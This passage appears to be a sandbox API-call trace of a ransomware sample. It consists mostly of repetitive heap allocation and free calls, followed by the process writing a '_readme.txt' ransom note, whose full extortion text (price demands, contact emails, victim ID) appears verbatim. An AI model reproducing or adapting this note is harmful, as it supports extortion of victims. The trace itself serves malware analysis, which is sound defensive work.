RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.859] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.859] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.859] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.859] PathFindFileNameW (pszPath="") returned="" [0142.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.859] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.860] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.860] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.860] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.860] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0142.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.860] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0142.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.878] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.878] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.878] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 